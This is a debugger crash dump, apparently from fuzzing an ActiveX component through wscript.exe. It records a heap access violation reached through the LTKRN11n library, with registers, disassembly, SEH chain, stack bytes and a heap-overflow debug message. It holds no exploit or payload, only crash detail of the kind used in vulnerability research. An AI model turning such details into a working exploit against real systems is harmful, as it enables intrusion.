13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02  [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00  [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02  [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02  [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40  [............`...]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478    CMP BYTE PTR [EBX+7],FF
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C839AD8    KERNEL32.dll
4   7C90E920    ntdll.dll
5   7C839AD8    KERNEL32.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C96E478                ntdll.7C96FA1D               
ntdll.7C96FA1D                ntdll.7C94D281               
ntdll.7C94D281                KERNEL32.7C834D23            
KERNEL32.7C834D23             LTKRN11n.2001087F            
LTKRN11n.2001087F             ntdll.7C913A43               
ntdll.7C913A43                KERNEL32.7C80C136            
KERNEL32.7C80C136             KERNEL32.7C80B72F            
 
 
Registers:
--------------------------------------------------
EIP 7C96E478
EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000
 
 
Block Disassembly:
--------------------------------------------------
7C96E468    PUSH EBX
7C96E469    MOV EBX,[EBP+C]
7C96E46C    TEST EBX,EBX
7C96E46E    PUSH ESI
7C96E46F    MOV ESI,[EBP+8]
7C96E472    JE 7C96E53E
7C96E478    CMP BYTE PTR [EBX+7],FF   <--- CRASH
7C96E47C    JNZ SHORT 7C96E4BC
7C96E47E    CMP BYTE PTR [ESI+586],2
7C96E485    JNZ SHORT 7C96E48F
7C96E487    MOV EAX,[ESI+580]
7C96E48D    JMP SHORT 7C96E491
7C96E48F    XOR EAX,EAX
7C96E491    TEST EAX,EAX
7C96E493    JE 7C96E53E
 
 
ArgDump:
--------------------------------------------------
EBP+8   00150000 -> 000000C8
EBP+12  FFFFFFF8
EBP+16  7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20  00000000
EBP+24  00000000
EBP+28  00000003
 
 
Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C  [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00  [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E  [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00  [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C  [................]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------
 
HEAP[wscript.exe]:
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec